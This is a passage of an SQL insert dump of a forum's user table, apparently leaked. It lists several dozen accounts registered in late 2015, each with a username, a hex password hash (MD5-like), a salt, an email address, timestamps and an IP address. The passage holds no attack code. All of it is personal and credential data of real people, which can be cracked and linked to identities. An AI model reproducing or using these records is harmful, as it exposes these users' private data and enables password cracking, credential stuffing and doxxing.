'+`e{%z#(^%pDW^n^^0k,BlSg9d2Lwm', 0, 0, 0, '', 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (191, 2, '', 0, 'hack2life', 'b899fe49298c0778dff95e52b6f884a9', '2015-10-30', 'truecrownprince@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446217285, 0, 1450991629, 1451484431, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.80.5', 0, 1, 0, 0, -1, 0, 0, 'x5xD;*vsXIj/;-\"c[t&7Nmq=FI7(+l', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (192, 2, '', 0, 'aPuhov', '6db81cfb26fdcbcbd3ab9bc9adbafd19', '2015-10-30', 'alex_puhov@mail2tor.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446217285, 0, 1446217285, 1446217297, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.104.49', 0, 1, 0, 0, -1, 0, 0, '_kUXX;B)S)1J_OS/Y\'1[bl{*<9C@,K', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (193, 2, '', 0, 'ssdtux', '411a43d353379686fd067bf5899c54ef', '2015-10-30', 'ssdtux@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446217808, 0, 1458084463, 1458084463, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.53.71', 0, 1, 0, 0, -1, 0, 0, 'CXdI)Y{Dq+)J:Jw_/D]sv7+cRfy_miRqr]e<@KUGwm', 0, 0, 0, '', 0, 0, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (198, 2, '', 0, 'DDShadoww', '2e175be6bb0515597e57cfd33f7826e7', '2015-10-30', 'ddshadoww@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446219634, 0, 1446582261, 1447754455, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '141.101.104.143', 0, 1, 0, 0, -1, 0, 0, '\"U/g-/ZN$w>/!jF/rv/Q08JS>b(FPI', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (199, 2, '', 0, 'kukumumu', '54123a02d545bfee206b4dcc8768f624', '2015-10-30', 'Kukumumu@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446220230, 0, 1446220230, 1446220230, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.80.14', 0, 1, 0, 0, -1, 0, 0, 'tPS9}R<}!igL_\"&;=K=r<-aoT,!5/$', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (200, 2, '', 0, 'bingo', '0346d6ebc7cdedf99bb404d24843813c', '2015-10-30', 'pentagor@inbox.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446221412, 0, 1446221412, 1446221432, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '162.158.90.140', 0, 1, 0, 0, -1, 0, 0, 'F2GHd%Y[bhE!b-Q6~UlSLe=kO*]]N3', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (201, 2, '', 0, 'r00t', '0b96f5907f8aa1c8e47347f23b86f35a', '2015-10-30', 'bashsplit@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446221508, 0, 1446221538, 1447755574, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '162.158.90.140', 0, 1, 0, 0, -1, 0, 0, ')$497d6AvP}cE/]%pZi25P[w<@$!ld', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (202, 2, '', 0, 'neuegram', 'd1e096600712a94973addfab8d03adad', '2015-10-30', 'neuegram@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446222530, 0, 1446222530, 1446222612, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.50.68', 0, 1, 0, 0, -1, 0, 0, '?0I\\rB:XM,h+S#=XMFWM3iuU*v\\?a.', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (203, 2, '', 0, 'LonerD', '119db764d0bbd8a2cebd3c6086507ba5', '2015-10-30', 'kailost@yandex.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446222660, 0, 1446222660, 1446223120, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '141.101.81.13', 0, 1, 0, 0, -1, 0, 0, 'L;>;%wH1[YnZKuT:Q2g$eQ2ua.@)S$', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (204, 2, '', 0, 'easyrider', 'd76d3773bd11570725364b94e25c25d3', '2015-10-30', 'isa817@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446222713, 0, 1446222713, 1446222881, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '162.158.91.146', 0, 1, 0, 0, -1, 0, 0, 'u[Xr8;+s>P&,lK+V#W\"Ex=vR44iPz[', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (205, 2, '', 0, 'milk', '99014406df723cc48c530d514dd16066', '2015-10-30', 'rjkilk@ohlol.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446223260, 0, 1446223260, 1446223391, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.81.20', 0, 1, 0, 0, -1, 0, 0, 'lmYmh9s>)%wHf0h/LSL4yPS:URYT^Lw,%0OK\';4ILx13', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (208, 2, '', 0, 'b0cah', '6eb8fd9431613c4f5034067700ae61b9', '2015-10-30', 'tejobro1@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446224115, 0, 1449123926, 1449125399, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.225.14', 0, 1, 0, 0, -1, 0, 0, 'O[X_XOe5GEWEspsr;z,X}*!ik+_', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (210, 2, '', 0, 'aslan', '361e74b6d6aab655277e921bff4d7a1b', '2015-10-30', 'dukaev999@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446224693, 0, 1451074037, 1451528741, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '141.101.104.143', 0, 1, 0, 0, -1, 0, 0, '}JLTY,e%3{\\MpmVTS@)#c>Gx{2.T:.', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (211, 2, '', 0, 'gago21', 'e2f9016074f4e96c49ad983f88ee1512', '2015-10-30', 'wanted_kus@hotmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446224724, 0, 1467638132, 1467638132, 1456070598, 2900, 1, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.53.71', 100, 1, 0, 0, -1, 0, 0, 'Jj<3E{1]V$x@u1GQ54=;#Ra<\"=\"P6w', 0, 0, 0, '', 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (212, 2, '', 0, 'jovie', 'dc154864424505992a3f92cc688fef81', '2015-10-30', 'jovie@ngs.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446224982, 0, 1446228533, 1446228533, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.80.101', 0, 1, 0, 0, -1, 0, 0, 'Kq[UR!&-:XAUTk/>9\"6p(J.A60JYGz', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (213, 2, '', 0, 'ownager', '559422617d42ca083e8db66e04dc88dc', '2015-10-30', 'drmint80@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446226585, 0, 1446226585, 1446226877, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.53.107', 0, 1, 0, 0, -1, 0, 0, '_*Pc]HTT]%|L_0|}%yM\\x+S_a-#3Y}', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (214, 2, '', 0, 'undefined', '6d83b7f3a2e5fcf174db8b62098a21c5', '2015-10-30', 'undefined@grr.la', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446228194, 0, 1446228212, 1446228212, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.49.64', 0, 1, 0, 0, -1, 0, 0, 'JzSehlt{;!2dSqP9U[+D#z8O:G,mWO', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (215, 2, '', 0, 'darckness44', 'f681e5ff279d06548c52ee4aa82e0cd9', '2015-10-30', 'darckness44@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446228239, 0, 1446228239, 1446230149, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.49.64', 0, 1, 0, 0, -1, 0, 0, 'P7!Vsrf~G{Q[>AYCe3BN=bx\'}6@~Xb', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (216, 2, '', 0, 'ree4', '9896b87f5094e7a286a4d63417f27fb2', '2015-10-30', 'samirsamo1337@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446228840, 0, 1471642484, 1471642484, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.105.253', 0, 1, 0, 0, -1, 0, 0, '-n(-nTS5Qs\"#vnBJ!Uv45\"%*YX;5m>', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (217, 2, '', 0, 'pr0cx', '87d87a35c1841271c5c907253910665d', '2015-10-30', 'mrripmax@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446229003, 0, 1446229109, 1446236152, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '188.114.99.91', 0, 1, 0, 0, -1, 0, 0, 'sWK}8yJW\'M`mJ9gU\'X$9BD=[f*T+O\'Y930:,~w-gj8d&', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (219, 2, '', 0, 'wootak', '158725d1f3e6727d54010b47fccf551c', '2015-10-30', 'unctus@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446230077, 0, 1446230077, 1446230112, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '108.162.210.131', 0, 1, 0, 0, -1, 0, 0, '?M\'G#HTF\"aui-YU\\|lquO,SXP=u\"]]', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (220, 2, '', 0, 'zepsus', '96a33604467e34009339747d6260f652', '2015-10-30', 'zepsusyo@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446230251, 0, 1462636354, 1462636354, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.91.130', 0, 1, 0, 0, -1, 0, 0, 'y]6p0A91q.coPhDJ\\_G}F`n0cJ\\.bA', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (221, 2, '', 0, 'ShadowHat', '87779363a40f8dc5a7bf6071b6815d09', '2015-10-30', 'shadow_hat@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446230847, 0, 1446230847, 1446231635, 0, 0, 0, 0, 4, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.17.6', 0, 1, 0, 0, -1, 0, 0, ';.Oc/N0C~[iDCoC<5wpJzTLEDK@P0o', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (222, 2, '', 0, 'Fullk1d', '43a533eb0b48ae8773789452fffc5c71', '2015-10-30', 'fortesting2015@ya.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446232339, 0, 1446232701, 1456062423, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '162.158.103.99', 0, 1, 0, 0, -1, 0, 0, ',f1`Y!t|-:h+C/H&5Y)fbU#\\jpk#]l', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (223, 2, '', 0, 'kdiler', '551e66159e70df30cae90d424f058fd8', '2015-10-30', 'kochevd@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446232379, 0, 1456241843, 1456428360, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '141.101.81.16', 0, 1, 0, 0, -1, 0, 0, 'e!eSgNX_PAX&GfXavxv](#,)+4w8je', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (224, 2, '', 0, 'lol', 'a65824bd714dbb58bd37478558f3da4f', '2015-10-30', 'ddmcc@inbox.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446232631, 0, 1446233574, 1446441631, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.105.248', 0, 1, 0, 0, -1, 0, 0, 'b@viM]b--i2r7IiB(xQS)?-O;u[#zK', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (225, 2, '', 0, 'Taygga', '760e7badd87dc63d43783d2c73aee865', '2015-10-30', 'taygga@inbox.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446233044, 0, 1446233044, 1446233277, 0, 0, 0, 0, 4, '7', 0, 0, 0, 0, 0, 45091863, '', '0000-00-00', -1, -1, '141.101.81.22', 0, 1, 0, 0, -1, 0, 0, 'G#CYE,_#b&T`$4Q@Fe|lJ+9W7`EUSJ', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (226, 2, '', 0, 'Daynine', 'ee7ea7c363b3bb7ef8b7e03bb8adeb34', '2015-10-30', 'Dday394@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446233170, 0, 1446233170, 1446233170, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.81.14', 0, 1, 0, 0, -1, 0, 0, 'Tq94tz9I[=].\\%rYp>d+u{j;Q>d;92', 0, 0, 0, '', 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (227, 2, '', 0, 'Ivan', '2b9f425a94bf3b9fdf8fd1761fa51c73', '2015-10-30', 'dom13@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446235953, 0, 1472005052, 1472005052, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '162.158.91.86', 0, 1, 0, 0, -1, 0, 0, '5blKM3]Tf;gP%(\\u+q/-Ne\'y8u^]5:', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (228, 2, '', 0, 'r0rshark', 'ae15c1ab4655cbc5f3abe65c985524f7', '2015-10-30', 'fons.pentest@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446240184, 0, 1446240184, 1446240461, 0, 0, 0, 0, 4, '1', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.105.247', 0, 1, 0, 0, -1, 0, 0, '?-femO0pN=\';;&WEXD?,ID~M/lY=,o', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (229, 2, '', 0, '0l3g', '20bbdeaff829e6b281238a5bad4ccc54', '2015-10-31', 'coolkid@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446249579, 0, 1446251537, 1446251537, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.229.19', 0, 1, 0, 0, -1, 0, 0, '8P8+&&8RP_p!SXG/Pc@T!m($;dG4~s', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (230, 2, '', 0, 'naGDan', '09919cd220b64ffab22ecd989d9cabe7', '2015-10-31', 'nagdan@ya.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446249698, 0, 1446249714, 1446272744, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.80.12', 0, 1, 0, 0, -1, 0, 0, '(wE/V1)iN&R)di]LnLY\'{w`tt;3+1E', 0, 0, 0, '', 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (231, 2, '', 0, 'karasawa', 'a7b02b535da40a7ca2e815ec009218cc', '2015-10-31', 'sixfourgigabyte@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446263559, 0, 1446537639, 1446541393, 0, 0, 0, 0, 4, '9', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.226.43', 0, 1, 0, 0, -1, 0, 0, '^U\'1pg9cUF\\}cTCV7rRs\'J#dea?6Lh', 0, 0, 0, '', 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (232, 2, '', 0, 'strlock', '15350e3993c30662024b7e47326a5d70', '2015-10-31', 'strlock@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446270681, 0, 1446270681, 1446271008, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.229.32', 0, 1, 0, 0, -1, 0, 0, '<$ygx&Z~1GEX*#KO):Xp7NW]IxZJFo', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (233, 2, '', 0, 'ultra', 'da1a400225eeb262442a25c1eb7c75d8', '2015-10-31', 'support@techgroup.me', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446276101, 0, 1446276101, 1446276276, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '141.101.104.181', 0, 1, 0, 0, -1, 0, 0, 't!y/Slxmd[zqOCl\\\"-u@\\[,\"X|MTff', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (234, 2, '', 0, 'gagaloop', '27d23cb2e92d3a7ea39e5941358c3bd9', '2015-10-31', 'gagalo0pp@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446276367, 0, 1446276367, 1446278115, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '108.162.216.193', 0, 1, 0, 0, -1, 0, 0, 'f\"13}*G|D+(EQpqWmz}O$3s*`@wG{2', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (235, 2, '', 0, 'ca0', 'e7b1470765a4fa7f03509f39da9c9561', '2015-10-31', 'trueinstaller@yahoo.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446276686, 0, 1446276748, 1446276748, 0, 0, 0, 0, 4, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.241.176', 0, 1, 0, 0, -1, 0, 0, 'xqj=ys{sX;daVS1o7s82i8m*PI#/Pl', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (236, 2, '', 0, 'Ar3s', 'c25b8d8c9f966cb886befc0396d95e1f', '2015-10-31', 'whoiam@freeletter.me', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446276756, 0, 1446278978, 1446280790, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '141.101.104.181', 0, 1, 0, 0, -1, 0, 0, 'N2QCN9fqZ`f!gkXdH8XVc`K1G@>J:8', 0, 0, 0, '', 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (237, 2, '', 0, 'kail', 'bbe8fffe8612251758559f2a0f566041', '2015-10-31', '2ak4d@notsharingmy.info', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446279360, 0, 1454173752, 1457729725, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.216.183', 0, 1, 0, 0, -1, 0, 0, 'YU)glp4$0+2.qc_PE$jom8I\"VNvRwV}JYUEQcSyj', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (246, 2, '', 0, 'tao', '9d7f0fe982d9f76e7fe654366d7ea899', '2015-10-31', 'tailoredaccessoperations@hush.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446292990, 0, 1446293117, 1456065286, 0, 0, 0, 0, 4, '-8', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.91.109', 0, 1, 0, 0, -1, 0, 0, '78\\\'9wQw)$.N/pv$:6q~[%W|2P}Qt\\', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (247, 2, '', 0, 'painter', '4281eeecbb5e1ec8ecda4efc134bd9df', '2015-10-31', 'painter@live.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446293542, 0, 1446293542, 1446293573, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '141.101.105.231', 0, 1, 0, 0, -1, 0, 0, 'cL)$5sfgN9[b%4q?%56^%5v`eRJzYb', 0, 0, 0, '', 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (248, 2, '', 0, 'tirefire', 'd4def808a21f9a7db5d7677cb6092983', '2015-10-31', 'uj@mailinator.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446294896, 0, 1446294896, 1446294994, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.55.197', 0, 1, 0, 0, -1, 0, 0, 'JkAAtT<-.%;EPVIj)DXtI3Wb-^ywDS', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (250, 2, '', 0, 'null3d', '6d982b8ae26a9b68cd95693e20fa639b', '2015-10-31', 'lol@mt2015.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446297210, 0, 1446297210, 1446297419, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.104.43', 0, 1, 0, 0, -1, 0, 0, 'ozj|\"Pe&l};.rLAnJBQ1r>$iF+m,,t', 0, 0, 0, '', 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (259, 2, '', 0, 'sup3ria', '3a01d41287082b9f7ee465582644b318', '2015-10-31', 'john.smitherham@openmailbox.org', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446326148, 0, 1446326148, 1446326276, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '162.158.91.129', 0, 1, 0, 0, -1, 0, 0, '0d43GS]AJe2pRkpa9U6uA.;F_:ft|z', 0, 0, 0, '', 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (260, 2, '', 0, 'zullek', '21e97d7f10f6040c44119ec4b3d1c781', '2015-11-01', 'zullek@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446334335, 0, 1446334335, 1446334385, 0, 0, 0, 0, 4, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.104.93', 0, 1, 0, 0, -1, 0, 0, '|4!hRMDQrv*r=p^*YU/DHb3>ib2ga<', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (261, 2, '', 0, 'cc0de', 'd192ee59a44ae30ff56ca8141bf7363a', '2015-11-01', 'cc0de@icloud.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446355240, 0, 1446360520, 1446361634, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.229.16', 0, 1, 0, 0, -1, 0, 0, '4w]%b`bX18{U#!|Z*>-_&Dh!Tb/+n?3', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (263, 2, '', 0, 'vx9090', 'bb9467f932f6dee949e5a93885411cbc', '2015-11-01', 'sahvbddas37@ghostmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446397330, 0, 1446397575, 1446397788, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.90.84', 0, 1, 0, 0, -1, 0, 0, '@/S1F]:fbzs9^StWU*bLO$fQ0|4N73', 0, 0, 0, '', 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (264, 2, '', 0, 'Cyber Tjak', 'ace6bf9f20c781d66f9961debedb9b3e', '2015-11-01', '1337Tjak@Googlemail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446407319, 0, 1446407527, 1449938985, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.104.93', 0, 1, 0, 0, -1, 0, 0, '|zLul~HO&UHS&P5V+;S0YegHOLNzoF', 0, 0, 0, '', 0, 0, 11, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (265, 2, '', 0, 'Tyskie', 'a2917e66cd6940574d9844d2f83af98d', '2015-11-01', 'uoukouku@wegwerfemail.de', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446407812, 0, 1446407812, 1446409180, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '141.101.104.143', 0, 1, 0, 0, -1, 0, 0, 'WHR09G$LSB\"!mXYn\"\"-&-', 0, 0, 0, '', 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (267, 2, '', 0, 'fuzzyf10w', '49cddf23bf774cf28b13d81ba010ff58', '2015-11-02', 'w01fyzzuf@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446441007, 0, 1446441231, 1446532827, 0, 0, 0, 0, 4, '6', 0, 0, 0, 0, 0, 45091863, '', '0000-00-00', -1, -1, '173.245.53.73', 0, 1, 0, 0, -1, 0, 0, 'PYhWKoMGT-e=,oxz5AmruhY;w(RX,!', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (268, 2, '', 0, 'flour', 'c33ce2196786a51f1b29f29e298eede1', '2015-11-02', 'sirname2016@ya.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446444577, 0, 1446445144, 1458208915, 0, 0, 0, 0, 4, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.17.6', 0, 1, 0, 0, -1, 0, 0, 'n.-uX(rbI\\LdL(L=6c\'}iL@X3V=99M', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (269, 2, '', 0, 'ninjatos', '18842d395109471587de2774f7c505ca', '2015-11-02', 'hcw75046@foxja.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446449994, 0, 1446449994, 1446450513, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '108.162.229.7', 0, 1, 0, 0, -1, 